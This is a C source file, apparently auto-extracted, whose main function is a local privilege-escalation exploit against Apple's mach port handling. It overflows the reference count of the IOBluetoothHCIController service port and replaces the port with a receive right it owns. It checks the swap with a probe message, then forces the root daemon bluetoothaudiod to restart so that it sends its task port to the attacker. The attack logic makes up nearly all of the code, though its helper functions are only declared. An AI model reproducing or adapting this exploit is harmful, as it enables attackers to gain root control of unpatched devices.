
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_5__ TYPE_2__ ;
typedef struct TYPE_4__ TYPE_1__ ;


typedef scalar_t__ uint32_t ;
typedef int reply ;
typedef int msg ;
typedef int mach_port_t ;
typedef int mach_msg_size_t ;
struct TYPE_4__ {int msgh_remote_port; int msgh_id; int msgh_size; int msgh_bits; int member_0; } ;
typedef TYPE_1__ mach_msg_header_t ;
struct TYPE_5__ {TYPE_1__ header; int member_0; } ;
typedef TYPE_2__ mach_msg_empty_rcv_t ;
typedef int kern_return_t ;


 int IOServiceGetMatchingService (int ,int ) ;
 int IOServiceMatching (char*) ;
 int MACH_MSGH_BITS (int ,int ) ;
 int MACH_MSG_OPTION_NONE ;
 int MACH_MSG_TIMEOUT_NONE ;
 int MACH_MSG_TYPE_COPY_SEND ;
 int MACH_PORT_NULL ;
 int MACH_RCV_MSG ;
 int MACH_RCV_TIMEOUT ;
 int MACH_SEND_MSG ;
 int force_bluetoothaudiod_restart () ;
 int getpid () ;
 int inc_and_dec_ref (int) ;
 int kIOMasterPortDefault ;
 int leak_n_refs (int,scalar_t__) ;
 int leak_one_ref (int) ;
 char* mach_error_string (int ) ;
 int mach_msg (TYPE_1__*,int,int ,int,int,int,int) ;
 int mach_task_self () ;
 int printf (char*,...) ;
 int replace_with_receive () ;
 int self ;
 int service_requests (int) ;

int main() {
 self = mach_task_self();





  mach_port_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController"));
  printf("%d : 0x%x\n", getpid(), service);


  uint32_t max_refs = 40;
  leak_n_refs(service, 0x100000000-max_refs);





  mach_port_t fake_service_port = MACH_PORT_NULL;
  for (uint32_t i = 0; i < max_refs; i++) {
    inc_and_dec_ref(service);

    mach_port_t replacer_ps = replace_with_receive();


    mach_msg_header_t msg = {0};
    msg.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
    msg.msgh_remote_port = service;
    msg.msgh_id = 0x41414141;
    msg.msgh_size = sizeof(msg);
    kern_return_t err;
    err = mach_msg(&msg,
                   MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
                   (mach_msg_size_t)sizeof(msg),
                   0,
                   MACH_PORT_NULL,
                   MACH_MSG_TIMEOUT_NONE,
                   MACH_PORT_NULL);
    printf("sending probe: %s\n", mach_error_string(err));

    mach_msg_empty_rcv_t reply = {0};
    mach_msg(&reply.header,
             MACH_RCV_MSG | MACH_RCV_TIMEOUT,
             0,
             sizeof(reply),
             replacer_ps,
             1,
             0);

  if (reply.header.msgh_id == 0x41414141) {

      printf("got the probe message\n");
      fake_service_port = replacer_ps;
      break;
    }
    printf("trying again (%d)\n", i);


    leak_one_ref(service);
  }


  printf("worked? - forcing a root process to restart, hopefully will send us its task port!\n");

 force_bluetoothaudiod_restart();

  service_requests(fake_service_port);

  return 0;
}
